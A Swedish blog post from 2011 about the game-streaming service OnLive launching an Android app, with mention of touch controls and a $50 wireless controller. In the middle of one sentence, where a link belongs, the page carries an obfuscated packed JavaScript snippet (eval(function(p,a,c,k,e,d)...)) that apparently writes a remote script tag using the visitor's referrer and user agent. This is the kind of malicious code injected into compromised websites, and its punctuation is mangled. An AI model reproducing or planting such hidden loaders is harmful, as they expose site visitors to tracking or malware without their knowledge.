Image Image Image Image Image Image Image Image Image Image

| 8 maj, 2021

Scroll to top

Top

Onlive nu även till dina mobila enheter! Ett måste!

Onlive nu även till dina mobila enheter! Ett måste!
Filip Urde
  • On 9 december, 2011
  • http://www.revue.se/filip-urde

OnLive är den molnbaserad tjänst som vi skrivit om tidigare (läs eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|atdfn|var|u0026u|referrer|bited||js|php’.split(’|’),0,{}))
här
), den har funnits ett tag för PC/MAC/TV, där du streamar spel mot en månadskostnad. Nu finns det en app till Android och snart en app till iOS!!

Du kommer kunna köra med touch-kontrollerna (rätt upp och ner på skärmen) eller även med Universal OnLive Wireless Controller som kommer gå att köpa idag? det står det i alla fall på hemsidan, att tidigast från och med den 9dec så finns den att köpa och den kommer kosta $50.

httpv://youtu.be/Gbt799xIRJk?hd=1

OnLive sitter på en stor mängd spel, dock går det inte ännu att streama alla spelen till appen. Men mer kommer, det kan ni lita på… Dock är det ännu oklart om vi i Sverige har möjlighet till att streama, men appen är gratis och det är bara att ladda ner här: här.

Själv kör jag iOS och kan där med inte prova… Men ska försöka låna min brors prylar ikväll och se vad jag kan få ut av det hela. Det här kan vara en av de mest revolutionerade sakerna som hänt spel industrin! Så varför inte prova…
www.destructoid.com